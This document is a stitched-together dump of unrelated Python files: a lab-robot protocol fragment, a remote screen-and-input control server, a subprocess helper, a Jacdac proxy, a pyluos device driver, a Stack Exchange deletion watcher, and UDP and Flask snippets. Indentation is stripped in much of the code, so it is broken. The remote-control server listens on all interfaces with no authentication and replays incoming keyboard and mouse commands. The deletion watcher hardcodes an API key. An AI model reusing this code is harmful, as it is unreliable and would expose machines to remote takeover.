m300.blow_out(e.top(-2))
m300.air_gap(20)
m300.drop_tip()
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
# remove initial supernatant
m300.flow_rate.aspirate = 50
remove_supernatant(STARTING_VOL, park=PARK)
wash(WASH_VOL, wash1, 15, park=PARK)
#m300.flow_rate.aspirate = 94
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
magdeck.disengage()
ctx.delay(minutes=5, msg='Airdrying beads at room temperature for 5 \
minutes.')
m300.flow_rate.aspirate = 50
elute(ELUTION_VOL, park=PARK)
|
main.py
|
import struct
import socket
from PIL import ImageGrab
from cv2 import cv2
import numpy as np
import threading
import keyboard
import mouse
bufsize = 1024
host = ('0.0.0.0', 80)
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(host)
soc.listen(1)
# JPEG quality 1-100: the lower the value, the stronger the compression and the greater the loss in image quality
IMQUALITY = 50
lock = threading.Lock()
official_virtual_keys = {
0x08: 'backspace',
0x09: 'tab',
0x0c: 'clear',
0x0d: 'enter',
0x10: 'shift',
0x11: 'ctrl',
0x12: 'alt',
0x13: 'pause',
0x14: 'caps lock',
    0x15: 'ime hangul mode',  # 0x15 is also the kana/hanguel IME key
0x17: 'ime junja mode',
0x18: 'ime final mode',
    0x19: 'ime kanji mode',  # 0x19 is also the hanja IME key
0x1b: 'esc',
0x1c: 'ime convert',
0x1d: 'ime nonconvert',
0x1e: 'ime accept',
0x1f: 'ime mode change request',
0x20: 'spacebar',
0x21: 'page up',
0x22: 'page down',
0x23: 'end',
0x24: 'home',
0x25: 'left',
0x26: 'up',
0x27: 'right',
0x28: 'down',
0x29: 'select',
0x2a: 'print',
0x2b: 'execute',
0x2c: 'print screen',
0x2d: 'insert',
0x2e: 'delete',
0x2f: 'help',
0x30: '0',
0x31: '1',
0x32: '2',
0x33: '3',
0x34: '4',
0x35: '5',
0x36: '6',
0x37: '7',
0x38: '8',
0x39: '9',
0x41: 'a',
0x42: 'b',
0x43: 'c',
0x44: 'd',
0x45: 'e',
0x46: 'f',
0x47: 'g',
0x48: 'h',
0x49: 'i',
0x4a: 'j',
0x4b: 'k',
0x4c: 'l',
0x4d: 'm',
0x4e: 'n',
0x4f: 'o',
0x50: 'p',
0x51: 'q',
0x52: 'r',
0x53: 's',
0x54: 't',
0x55: 'u',
0x56: 'v',
0x57: 'w',
0x58: 'x',
0x59: 'y',
0x5a: 'z',
0x5b: 'left windows',
0x5c: 'right windows',
0x5d: 'applications',
0x5f: 'sleep',
0x60: '0',
0x61: '1',
0x62: '2',
0x63: '3',
0x64: '4',
0x65: '5',
0x66: '6',
0x67: '7',
0x68: '8',
0x69: '9',
0x6a: '*',
0x6b: '=',
0x6c: 'separator',
0x6d: '-',
0x6e: 'decimal',
0x6f: '/',
0x70: 'f1',
0x71: 'f2',
0x72: 'f3',
0x73: 'f4',
0x74: 'f5',
0x75: 'f6',
0x76: 'f7',
0x77: 'f8',
0x78: 'f9',
0x79: 'f10',
0x7a: 'f11',
0x7b: 'f12',
0x7c: 'f13',
0x7d: 'f14',
0x7e: 'f15',
0x7f: 'f16',
0x80: 'f17',
0x81: 'f18',
0x82: 'f19',
0x83: 'f20',
0x84: 'f21',
0x85: 'f22',
0x86: 'f23',
0x87: 'f24',
0x90: 'num lock',
0x91: 'scroll lock',
0xa0: 'left shift',
0xa1: 'right shift',
0xa2: 'left ctrl',
0xa3: 'right ctrl',
0xa4: 'left menu',
0xa5: 'right menu',
0xa6: 'browser back',
0xa7: 'browser forward',
0xa8: 'browser refresh',
0xa9: 'browser stop',
0xaa: 'browser search key',
0xab: 'browser favorites',
0xac: 'browser start and home',
0xad: 'volume mute',
0xae: 'volume down',
0xaf: 'volume up',
0xb0: 'next track',
0xb1: 'previous track',
0xb2: 'stop media',
0xb3: 'play/pause media',
0xb4: 'start mail',
0xb5: 'select media',
0xb6: 'start application 1',
0xb7: 'start application 2',
0xbb: '+',
0xbc: ',',
0xbd: '-',
0xbe: '.',
0xe5: 'ime process',
0xf6: 'attn',
0xf7: 'crsel',
0xf8: 'exsel',
0xf9: 'erase eof',
0xfa: 'play',
0xfb: 'zoom',
0xfc: 'reserved ',
0xfd: 'pa1',
0xfe: 'clear',
0xba: ';',
0xde: '\'',
0xdb: '[',
0xdd: ']',
0xbf: '/',
0xc0: '`',
0xdc: '\\',
}
def ctrl(conn):
    '''
    Read control commands from the socket and replay them on this machine.
    '''
def Op(key, op, ox, oy):
# print(key, op, ox, oy)
if key == 1:
if op == 100:
                # left button down
mouse.move(ox, oy)
mouse.press(button=mouse.LEFT)
elif op == 117:
                # left button up
x, y = mouse.get_position()
if ox != x or oy != y:
if not mouse.is_pressed():
mouse.press(button=mouse.LEFT)
mouse.move(ox, oy)
mouse.release(button=mouse.LEFT)
elif key == 2:
            # scroll wheel event
if op == 0:
                # scroll up
mouse.move(ox, oy)
mouse.wheel(delta=-1)
else:
                # scroll down
mouse.move(ox, oy)
mouse.wheel(delta=1)
elif key == 3:
            # right mouse button
if op == 100:
                # right button down
mouse.move(ox, oy)
mouse.press(button=mouse.RIGHT)
elif op == 117:
                # right button up
mouse.move(ox, oy)
mouse.release(button=mouse.RIGHT)
else:
k = official_virtual_keys.get(key)
if k is not None:
if op == 100:
keyboard.press(k)
elif op == 117:
keyboard.release(k)
try:
base_len = 6
while True:
            cmd = b''
            rest = base_len
            while rest > 0:
                data = conn.recv(rest)  # subtract only what this recv() actually returned
                if not data:
                    return
                cmd += data
                rest -= len(data)
key = cmd[0]
op = cmd[1]
x = struct.unpack('>H', cmd[2:4])[0]
y = struct.unpack('>H', cmd[4:6])[0]
Op(key, op, x, y)
except:
return
# most recently decoded (compressed) frame as a numpy image
img = None
# most recently encoded frame (JPEG bytes)
imbyt = None
def handle(conn):
global img, imbyt
lock.acquire()
if imbyt is None:
imorg = np.asarray(ImageGrab.grab())
_, imbyt= cv2.imencode(".jpg", imorg, [cv2.IMWRITE_JPEG_QUALITY,IMQUALITY])
imnp = np.asarray(imbyt, np.uint8)
img = cv2.imdecode(imnp, cv2.IMREAD_COLOR)
lock.release()
lenb = struct.pack(">BI", 1, len(imbyt))
conn.sendall(lenb)
conn.sendall(imbyt)
while True:
cv2.waitKey(100)
gb = ImageGrab.grab()
imgnpn = np.asarray(gb)
_, timbyt= cv2.imencode(".jpg", imgnpn, [cv2.IMWRITE_JPEG_QUALITY,IMQUALITY])
imnp = np.asarray(timbyt, np.uint8)
imgnew = cv2.imdecode(imnp, cv2.IMREAD_COLOR)
        # compute the difference between the new frame and the previous one
imgs = imgnew - img
if (imgs!=0).any():
            # the frame has changed
pass
else:
continue
imbyt = timbyt
img = imgnew
        # lossless compression of the difference image
_, imb = cv2.imencode(".png", imgs)
        l1 = len(imbyt)  # size of the full encoded frame
        l2 = len(imb)  # size of the difference image
if l1 > l2:
            # send the difference image
lenb = struct.pack(">BI", 0, l2)
conn.sendall(lenb)
conn.sendall(imb)
else:
            # send the full encoded frame
lenb = struct.pack(">BI", 1, l1)
conn.sendall(lenb)
conn.sendall(imbyt)
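# --- Illustration only (not part of the original server) --------------------
# Sketch of how a viewer could consume the frame protocol used above: each
# frame is a 5-byte header struct.pack(">BI", kind, length) followed by
# `length` bytes of image data; kind 1 is a full JPEG frame, kind 0 is a
# PNG-encoded difference that is added to the previously decoded frame.
# The host/port below are assumptions.
def recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed")
        buf += chunk
    return buf
def viewer_sketch(host='127.0.0.1', port=80):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    frame = None
    while True:
        kind, length = struct.unpack(">BI", recv_exact(s, 5))
        payload = np.asarray(bytearray(recv_exact(s, length)), np.uint8)
        decoded = cv2.imdecode(payload, cv2.IMREAD_COLOR)
        # uint8 addition wraps around, matching the server's uint8 subtraction
        frame = decoded if kind == 1 else frame + decoded
        cv2.imshow("remote screen", frame)
        if cv2.waitKey(1) == 27:  # Esc to quit
            break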
while True:
conn, addr = soc.accept()
threading.Thread(target=handle, args=(conn,)).start()
threading.Thread(target=ctrl, args=(conn,)).start()
|
subprocess.py
|
# coding: utf-8
"""
Calling shell processes.
"""
import shlex
import threading
import traceback
from subprocess import Popen, PIPE
from .string import is_string
__author__ = 'Matteo Giantomassi'
__copyright__ = "Copyright 2014, The Materials Virtual Lab"
__version__ = '0.1'
__maintainer__ = 'Matteo Giantomassi'
__email__ = 'gmatteo@gmail.com'
__date__ = '10/26/14'
class Command:
"""
    Enables running subprocess commands in a separate thread with a TIMEOUT
option.
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
and
https://gist.github.com/kirpit/1306188
.. attribute:: retcode
Return code of the subprocess
.. attribute:: killed
True if subprocess has been killed due to the timeout
.. attribute:: output
stdout of the subprocess
.. attribute:: error
stderr of the subprocess
Example:
com = Command("sleep 1").run(timeout=2)
        print(com.retcode, com.killed, com.output, com.error)
"""
def __init__(self, command):
"""
:param command: Command to execute
"""
if is_string(command):
command = shlex.split(command)
self.command = command
self.process = None
self.retcode = None
self.output, self.error = '', ''
self.killed = False
def __str__(self):
return "command: %s, retcode: %s" % (self.command, self.retcode)
def run(self, timeout=None, **kwargs):
"""
        Run the command in a separate thread and wait at most timeout seconds.
kwargs are keyword arguments passed to Popen.
Return: self
"""
def target(**kw):
try:
# print('Thread started')
self.process = Popen(self.command, **kw)
self.output, self.error = self.process.communicate()
self.retcode = self.process.returncode
# print('Thread stopped')
except Exception:
self.error = traceback.format_exc()
self.retcode = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
# print("Terminating process")
self.process.terminate()
self.killed = True
thread.join()
return self
|
devtools.py
|
# pyright: reportGeneralTypeIssues=false
from asyncio import get_event_loop
from websockets import serve
from http.server import BaseHTTPRequestHandler, HTTPServer
from requests import get
from threading import Thread
from sys import argv
print("Jacdac DevTools (Python)")
internet = "--internet" in argv
HOST = '0.0.0.0' if internet else 'localhost'
WS_PORT = 8081
HTTP_PORT = 8082
clients = []
proxy_source: bytes
if internet:
print("WARNING: server bound to all network interfaces")
else:
print("use --internet to bind server to all network interfaces")
class Handler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
    def do_GET(self):
if self.path == "/":
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'no-cache')
self.send_header("Content-Length", str(len(proxy_source)))
self.end_headers()
self.wfile.write(proxy_source)
else:
self.send_error(404)
async def proxy(websocket, path: str):
clients.append(websocket)
print("client connected (%d clients)" % len(clients))
    # listen to the websocket client until it closes
try:
while websocket.open:
frame: bytes = await websocket.recv()
if len(frame) == 0:
continue
# dispatch to other clients
cs = clients.copy() # avoid races
for client in cs:
if client != websocket:
try:
await client.send(frame)
except:
print("client receive error")
except:
print("client receive error")
finally:
# remove from clients
clients.remove(websocket)
print("client disconnected (%d clients)" % len(clients))
# get proxy source
resp = get('https://microsoft.github.io/jacdac-docs/devtools/proxy')
if not resp.ok:
raise RuntimeError("proxy download failed")
proxy_source = resp.text.encode('utf-8')
def web():
print("local web: http://" + HOST + ":" + str(HTTP_PORT))
    http_server = HTTPServer((HOST, HTTP_PORT), Handler)
http_server.serve_forever()
def ws():
# start web socket server
print("websockets: ws://" + HOST + ":" + str(WS_PORT))
ws_server = serve(proxy, HOST, WS_PORT)
get_event_loop().run_until_complete(ws_server)
get_event_loop().run_forever()
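# --- Illustration only (not part of the original tool) ----------------------
# A minimal client sketch that connects to the proxy above and prints the size
# of every frame it receives; the URI assumes the default local port used here.
async def listen_sketch(uri="ws://localhost:" + str(WS_PORT)):
    from websockets import connect  # client-side counterpart of `serve`
    async with connect(uri) as sock:
        while True:
            print("received frame of %d bytes" % len(await sock.recv()))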
# start http server
thread = Thread(target = web)
thread.daemon = True
thread.start()
# start websocket server
ws()
|
device.py
|
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import logging
import threading
import logging.config
import numpy as np
from datetime import datetime
from collections import defaultdict
from .io import discover_hosts, io_from_host, Ws
from .containers import name2mod
from anytree import AnyNode, RenderTree, DoubleStyle
def run_from_unittest():
    return 'unittest' in sys.modules
known_host = {
'ergo': ['/dev/cu.usbserial-DN2AAOVK', '/dev/cu.usbserial-DN2YEFLN'],
'handy': ['/dev/cu.usbserial-DN2X236E'],
'eddy': ['pi-gate.local'],
}
class contList(list):
def __repr__(self):
s = '-------------------------------------------------\n'
s += '{:<20s}{:<20s}{:<5s}\n'.format("Type", "Alias", "ID")
s += '-------------------------------------------------\n'
for elem in self:
s += '{:<20s}{:<20s}{:<5d}\n'.format(elem.type, elem.alias, elem.id)
return s
class nodeList(list):
def __repr__(self):
# Display the topology
s = ''
prefill = ''
prechild = False
for pre, fill, node in RenderTree(self[0], style=DoubleStyle()):
child = []
if (node.parent == None):
branch = " ┃ "
for i,x in enumerate(node.port_table):
child.append(i)
else:
l_port_id = '?'
for i,x in enumerate(node.parent.port_table):
if (x == node.id):
l_port_id = str(i)
r_port_id = node.port_table.index(min(node.port_table))
for i,x in enumerate(node.port_table):
if ((i != r_port_id) and (x != 65535)):
child.append(i)
branch = str(l_port_id) + ">┃" + str(r_port_id) + " "
prefill = (prefill[:len(fill)]) if len(prefill) > len(fill) else prefill
s +='{:<{fillsize}s}'.format(prefill, fillsize=len(fill))
if (prechild == True):
position = -4
s = s[:position] + '║' + s[position+1:]
s += " ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓\n"
tmpstr = "%s╭node %s" % (branch, node.id)
s += pre + '{:^10s}'.format(tmpstr)
if (node.certified == True):
s += '{:^41s}'.format("Certified") + "┃\n"
else:
s += '{:^41s}'.format("/!\\ Not certified") + "┃\n"
s += fill + " ┃ │ " + '{:<20s}{:<20s}{:<5s}'.format("Type", "Alias", "ID")+ "┃\n"
for y,elem in enumerate(node.containers):
if (y == (len(node.containers)-1)):
s += fill + " ┃ ╰> " + '{:<20s}{:<20s}{:<5d}'.format(elem.type, elem.alias, elem.id)+ "┃\n"
else:
s += fill + " ┃ ├> " + '{:<20s}{:<20s}{:<5d}'.format(elem.type, elem.alias, elem.id) + "┃\n"
if (not child):
s += fill + " >┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛\n"
prechild = False
else:
s += fill + "╔>┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛\n"
prechild = True
prefill = fill
return s
class Device(object):
_heartbeat_timeout = 5 # in sec.
_max_alias_length = 15
_base_log_conf = os.path.join(os.path.dirname(__file__),
'logging_conf.json')
@classmethod
def discover(cls):
hosts = discover_hosts()
possibilities = {
k: [h for h in v if h in hosts]
for k, v in known_host.items()
}
return possibilities
def __init__(self, host,
IO=None,
log_conf=_base_log_conf,
test_mode=False,
*args, **kwargs):
if IO is not None:
self._io = IO(host=host, *args, **kwargs)
else:
self._io = io_from_host(host=host,
*args, **kwargs)
if os.path.exists(log_conf):
with open(log_conf) as f:
config = json.load(f)
logging.config.dictConfig(config)
self.logger = logging.getLogger(__name__)
self.logger.info('Connected to "{}".'.format(host))
self._send_lock = threading.Lock()
self._cmd_lock = threading.Lock()
# We force a first poll to setup our model.
self._setup()
self.logger.info('Device setup.')
self._last_update = time.time()
self._running = True
self._pause = False
# Setup both poll/push synchronization loops.
self._poll_bg = threading.Thread(target=self._poll_and_up)
self._poll_bg.daemon = True
self._poll_bg.start()
self._baudrate = 1000000
def close(self):
self._running = False
self._poll_bg.join()
self._io.close()
@property
def baudrate(self):
return self._baudrate
@baudrate.setter
def baudrate(self, baudrate):
self._send({'baudrate': baudrate})
self._baudrate = baudrate
time.sleep(0.01)
def benchmark(self, target_id, data, repetition):
data = np.array(data, dtype=np.uint8)
self._bench_settings = {'benchmark': {'target': target_id, 'repetitions': repetition, 'data': [len(data)]}}
self._bench_Data = data.tobytes()
self._write( json.dumps(self._bench_settings).encode() + '\r'.encode() + self._bench_Data)
state = self._poll_once()
startTime = time.time()
retry = 0
while ('benchmark' not in state):
state = self._poll_once()
if (time.time()-startTime > 30):
self._write( json.dumps(self._bench_settings).encode() + '\r'.encode() + self._bench_Data)
retry = retry+1
if (retry == 3):
return (0, 100)
startTime = time.time()
#self._pause = False
return (state['benchmark']['data_rate'], state['benchmark']['fail_rate'])
def pause(self):
self._pause = True
time.sleep(1)
def play(self):
self._pause = False
def _setup(self):
self.logger.info('Sending detection signal.')
self._send({'detection': {}})
self.logger.info('Waiting for routing table...')
startTime = time.time()
state = self._poll_once()
while ('routing_table' not in state):
if ('route_table' in state):
self.logger.info("Watch out the Luos revision you are using on your board is too old to work with this revision on pyluos.\n Please consider updating Luos on your boards")
return
state = self._poll_once()
if (time.time()-startTime > 1):
self._send({'detection': {}})
startTime = time.time()
# Create nodes
self._containers = []
self._nodes = []
for i, node in enumerate(state['routing_table']):
if ('node_id' not in node):
self.logger.info("Watch out the Luos revision you are using on your board is too old to work with this revision on pyluos.\n Please consider updating Luos on your boards")
parent_elem = None
# find a parent and create a link
if (min(node["port_table"]) < node["containers"][0]["id"]):
parent_id = min(node["port_table"])
for elem in self._nodes:
if (elem.id == parent_id):
parent_elem = elem
                        break
# create the node
self._nodes.append(AnyNode(id=node["node_id"], certified=node["certified"], parent=parent_elem, port_table=node["port_table"]))
filtered_containers = contList([mod for mod in node["containers"]
if 'type' in mod and mod['type'] in name2mod.keys()])
# Create a list of containers in the node
self._nodes[i].containers = [
name2mod[mod['type']](id=mod['id'],
alias=mod['alias'],
device=self)
for mod in filtered_containers
if 'type' in mod and 'id' in mod and 'alias' in mod
]
# Create a list of containers of the entire device
self._containers = self._containers + self._nodes[i].containers
for mod in self._nodes[i].containers:
setattr(self, mod.alias, mod)
self._cmd = defaultdict(lambda: defaultdict(lambda: None))
self._cmd_data = []
self._binary = []
# We push our current state to make sure that
# both our model and the hardware are synced.
self._push_once()
@property
def containers(self):
return contList(self._containers)
@property
def nodes(self):
return nodeList(self._nodes)
# Poll state from hardware.
def _poll_once(self):
self._state = self._io.read()
self._state['timestamp'] = time.time()
return self._state
def _poll_and_up(self):
while self._running:
if not self._pause :
state = self._poll_once()
self._update(state)
self._push_once()
else :
time.sleep(0.1)
# Update our model with the new state.
def _update(self, new_state):
if 'dead_container' in new_state :
#we have lost a container put a flag on this container
alias = new_state['dead_container']
if hasattr(self, alias):
getattr(self, alias)._kill()
if 'assert' in new_state :
# A node assert, print assert informations
if (('node_id' in new_state['assert']) and ('file' in new_state['assert']) and ('line' in new_state['assert'])):
s = "************************* ASSERT *************************\n"
s += "* Node " + str(new_state['assert']['node_id']) + " assert in file " + new_state['assert']['file'] + " line " + str(new_state['assert']['line'])
s += "\n**********************************************************"
print (s)
if 'containers' not in new_state:
return
for alias, mod in new_state['containers'].items():
if hasattr(self, alias):
getattr(self, alias)._update(mod)
self._last_update = time.time()
def update_cmd(self, alias, key, val):
with self._cmd_lock:
self._cmd[alias][key] = val
def update_data(self, alias, key, val, data):
with self._cmd_lock:
self._cmd_data.append({alias: {key: val}})
self._binary.append(data.tobytes())
def _push_once(self):
with self._cmd_lock:
if self._cmd:
self._write( json.dumps({'containers': self._cmd}).encode())
self._cmd = defaultdict(lambda: defaultdict(lambda: None))
for cmd, binary in zip(self._cmd_data, self._binary):
time.sleep(0.01)
self._write( json.dumps({'containers': cmd}).encode() + '\r'.encode() + binary)
self._cmd_data = []
self._binary = []
def _send(self, msg):
with self._send_lock:
self._io.send(msg)
def _write(self, data):
with self._send_lock:
self._io.write(data)
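if __name__ == '__main__':
    # Illustration only: connect to a board on one of the serial ports listed
    # in `known_host` above, print the detected containers and topology, then
    # close the connection. The port name is an assumption for this sketch.
    print(Device.discover())
    device = Device('/dev/cu.usbserial-DN2AAOVK')
    print(device.containers)
    print(device.nodes)
    device.close()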
|
deletionwatcher.py
|
# coding=utf-8
import json
import os.path
import requests
import time
import threading
# noinspection PyPackageRequirements
import websocket
# noinspection PyPackageRequirements
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import chatcommunicate
import metasmoke
from globalvars import GlobalVars
import datahandling
from helpers import log
from parsing import fetch_post_id_and_site_from_url, to_protocol_relative
from tasks import Tasks
PICKLE_FILENAME = "deletionIDs.p"
# noinspection PyClassHasNoInit,PyBroadException,PyMethodParameters
class DeletionWatcher:
next_request_time = time.time() - 1
def __init__(self):
DeletionWatcher.update_site_id_list()
self.posts = {}
try:
self.socket = websocket.create_connection("wss://qa.sockets.stackexchange.com/")
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed to create a websocket connection')
return
if datahandling.has_pickle(PICKLE_FILENAME):
pickle_data = datahandling.load_pickle(PICKLE_FILENAME)
for post in DeletionWatcher._check_batch(pickle_data):
self.subscribe(post, pickle=False)
self._save()
threading.Thread(name="deletion watcher", target=self._start, daemon=True).start()
def _start(self):
while True:
msg = self.socket.recv()
if msg:
msg = json.loads(msg)
action = msg["action"]
if action == "hb":
self.socket.send("hb")
else:
data = json.loads(msg["data"])
if data["a"] == "post-deleted":
try:
post_id, _, _, post_url, callbacks = self.posts[action]
if post_id == str(data["aId"] if "aId" in data else data["qId"]):
del self.posts[action]
self.socket.send("-" + action)
Tasks.do(metasmoke.Metasmoke.send_deletion_stats_for_post, post_url, True)
for callback, max_time in callbacks:
if not max_time or time.time() < max_time:
callback()
except KeyError:
pass
def subscribe(self, post_url, callback=None, pickle=True, timeout=None):
post_id, post_site, post_type = fetch_post_id_and_site_from_url(post_url)
if post_site not in GlobalVars.site_id_dict:
log("warning", "unknown site {} when subscribing to {}".format(post_site, post_url))
return
if post_type == "answer":
question_id = datahandling.get_post_site_id_link((post_id, post_site, post_type))
if question_id is None:
return
else:
question_id = post_id
site_id = GlobalVars.site_id_dict[post_site]
action = "{}-question-{}".format(site_id, question_id)
max_time = (time.time() + timeout) if timeout else None
if action not in self.posts:
self.posts[action] = (post_id, post_site, post_type, post_url, [(callback, max_time)] if callback else [])
try:
self.socket.send(action)
except websocket.WebSocketException:
log('error', 'DeletionWatcher failed on sending {}'.format(action))
elif callback:
_, _, _, _, callbacks = self.posts[action]
callbacks.append((callback, max_time))
else:
return
if pickle:
Tasks.do(self._save)
def _save(self):
pickle_output = {}
for post_id, post_site, _, _, _ in self.posts.values():
if post_site not in pickle_output:
pickle_output[post_site] = [post_id]
else:
pickle_output[post_site].append(post_id)
datahandling.dump_pickle(PICKLE_FILENAME, pickle_output)
@staticmethod
def _check_batch(saved):
if time.time() < DeletionWatcher.next_request_time:
time.sleep(DeletionWatcher.next_request_time - time.time())
for site, posts in saved.items():
ids = ";".join(post_id for post_id in posts if not DeletionWatcher._ignore((post_id, site)))
uri = "https://api.stackexchange.com/2.2/posts/{}".format(ids)
params = {
'site': site,
'key': 'IAkbitmze4B8KpacUfLqkw(('
}
res = requests.get(uri, params=params)
json = res.json()
if "items" not in json:
log('warning',
'DeletionWatcher API request received no items in response (code {})'.format(res.status_code))
log('warning', res.text)
return
if 'backoff' in json:
DeletionWatcher.next_request_time = time.time() + json['backoff']
for post in json['items']:
if time.time() - post["creation_date"] < 7200:
yield to_protocol_relative(post["link"]).replace("/q/", "/questions/")
@staticmethod
def _ignore(post_site_id):
return datahandling.is_false_positive(post_site_id) or datahandling.is_ignored_post(post_site_id) or \
datahandling.is_auto_ignored_post(post_site_id)
@staticmethod
def update_site_id_list():
soup = BeautifulSoup(requests.get("https://meta.stackexchange.com/topbar/site-switcher/site-list").text,
"html.parser")
site_id_dict = {}
for site in soup.findAll("a", attrs={"data-id": True}):
site_name = urlparse(site["href"]).netloc
site_id = site["data-id"]
site_id_dict[site_name] = site_id
GlobalVars.site_id_dict = site_id_dict
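# --- Illustration only (not part of SmokeDetector itself) -------------------
# Sketch of how a caller could use DeletionWatcher.subscribe(): register a
# callback that fires if the post is deleted within the next hour. The URL is
# a placeholder, not a real post.
def _example_subscribe():
    watcher = DeletionWatcher()
    watcher.subscribe("https://stackoverflow.com/questions/1",
                      callback=lambda: log('info', 'watched post was deleted'),
                      timeout=3600)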
|
processo_1.py
|
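# --- Hypothetical scaffolding (not part of the original snippet) ------------
# The route handlers below reference `app`, `db`, `Data_Input`, `Thread`,
# `request`, `render_template`, `jb` (joblib) and `pd` (pandas) without
# defining them. A minimal sketch of what the surrounding application might
# look like is given here; the names, the sqlite URI and the model column are
# assumptions, not the original project's code.
from threading import Thread
import joblib as jb
import pandas as pd
from flask import Flask, request, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'  # assumed
db = SQLAlchemy(app)
class Data_Input(db.Model):  # assumed: auto-increment id plus one text column
    id = db.Column(db.Integer, primary_key=True)
    data_input = db.Column(db.Text)
# -----------------------------------------------------------------------------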
@app.route('/start_task')
def start_task():
def do_work(value):
# do something that takes a long time
import time
time.sleep(value)
    thread = Thread(target=do_work, kwargs={'value': request.args.get('value', 20, type=int)})
thread.start()
return 'started'
@app.route("/running_model", methods=['GET', 'POST'])
def running_model():
mdl = jb.load('app/models/mdl.pkl.z')
def raw_data():
if request.method == 'GET':
return render_template('get_data.html')
else:
in_data = Data_Input(data_input=request.form["data_input"])
db.session.add(in_data)
db.session.commit()
df = db.session.execute('SELECT * FROM data_input ORDER BY ID DESC LIMIT 1')
df_pd = pd.DataFrame(df)
title = df_pd.iat[0, 1]
return title
title = raw_data()
result = mdl.predict_proba([title])[0][1]
return render_template("result.html", result=result, title=title)
|
UDPclient.py
|
'''
UDPclient.py
Author: Colleen Kimball
Date: November 2, 2014
Description: This program connects to a server using UDP and pings the server 10 times, collecting RTT information and recording it.
'''
from socket import *
import time
import threading
#this function sends a ping message to the server and records the RTT
def ping(num, rtt):
clientSocket = socket(AF_INET, SOCK_DGRAM)
#set timeout to 1 second
clientSocket.settimeout(1)
#message must be in byte form
    message = b'Ping'
start=time.time()
clientSocket.sendto(message, ('localhost',12000))
try:
message,address = clientSocket.recvfrom(2048)
#elapsed is RTT
elapsed=(time.time()-start)
        print(str(num) + ' Message: ' + message.decode() + ' RTT: ' + str(elapsed) + '\n')
except timeout:
#set elapsed to -1 and check for it later so it doesn't skew data
elapsed=-1
print (str(num)+ ' Request Timed Out'+'\n')
clientSocket.close()
rtt.append(elapsed)
def main():
threads=[]
rtt=[]
for i in range(10):
#each thread pings the server
t=threading.Thread(target=ping, args=(i,rtt,))
threads.append(t)
t.start()
for t in threads:
t.join()
avg=0
lost=0
    minimum = max(rtt)
    for t in rtt:
        if t != -1:
            avg += t
            if minimum > t:
                minimum = t
        else:
            lost += 1
    # average over successful pings only, so timeouts don't skew the result
    received = len(rtt) - lost
    avg = avg / received if received else 0
print ('RTT: Minimum: '+str(minimum)+' Maximum: '+str(max(rtt))+' Average: '+str(avg) + ' Lost: '+str(lost)+'\n')
print("main finished")
main()
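# --- Illustration only (not part of the original assignment) ----------------
# A minimal UDP echo server sketch this client could be pointed at for local
# testing; the port matches the ('localhost', 12000) address used in ping()
# above, everything else is an assumption.
def echo_server(port=12000):
    serverSocket = socket(AF_INET, SOCK_DGRAM)
    serverSocket.bind(('localhost', port))
    while True:
        # echo each datagram straight back so the client can measure RTT
        message, address = serverSocket.recvfrom(2048)
        serverSocket.sendto(message, address)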
|
app.py
|
import os
import sys
import time
import logging
import datetime
import threading
try:
import Queue as queue
except ImportError:
# Python 3+
import queue
from ...vendor.Qt import QtWidgets, QtCore, QtGui
from ... import api, io
from .. import lib
from ...vendor import qtawesome as awesome
log = logging.getLogger(__name__)
module = sys.modules[__name__]
module.window = None
module.root = api.registered_root()
module.project = os.getenv("AVALON_PROJECT")
module.debug = bool(os.getenv("AVALON_DEBUG"))
module.closed = False
# Custom roles
DocumentRole = QtCore.Qt.UserRole + 1
RepresentationsRole = QtCore.Qt.UserRole + 2
LatestRole = QtCore.Qt.UserRole + 3
LocationRole = QtCore.Qt.UserRole + 4
# About to be downloaded
module._downloads = queue.Queue()
# Which downloads are in progress?
module._downloading = dict()
class Window(QtWidgets.QDialog):
"""Asset loader interface"""
download_progressed = QtCore.Signal(str, int)
download_completed = QtCore.Signal()
download_errored = QtCore.Signal(str)
def __init__(self, parent=None):
super(Window, self).__init__(parent)
self.setWindowTitle(
"Asset Loader 2.1 - {root}/{project}".format(
root=api.Session["AVALON_PROJECTS"],
project=api.Session["AVALON_PROJECT"])
)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
body = QtWidgets.QWidget()
sidepanel = QtWidgets.QWidget()
sidepanel.setFixedWidth(270)
footer = QtWidgets.QWidget()
footer.setFixedHeight(20)
container = QtWidgets.QWidget()
assets = QtWidgets.QListWidget()
subsets = QtWidgets.QListWidget()
versions = QtWidgets.QListWidget()
representations = QtWidgets.QListWidget()
# Enable loading many subsets at once
subsets.setSelectionMode(subsets.ExtendedSelection)
layout = QtWidgets.QHBoxLayout(container)
layout.addWidget(assets)
layout.addWidget(subsets)
layout.addWidget(versions)
layout.addWidget(representations)
layout.setContentsMargins(0, 0, 0, 0)
options = QtWidgets.QWidget()
layout = QtWidgets.QGridLayout(options)
layout.setContentsMargins(0, 0, 0, 0)
autoclose_checkbox = QtWidgets.QCheckBox("Auto-close")
layout.addWidget(autoclose_checkbox, 1, 0)
layout = QtWidgets.QHBoxLayout(body)
layout.addWidget(container)
layout.addWidget(sidepanel)
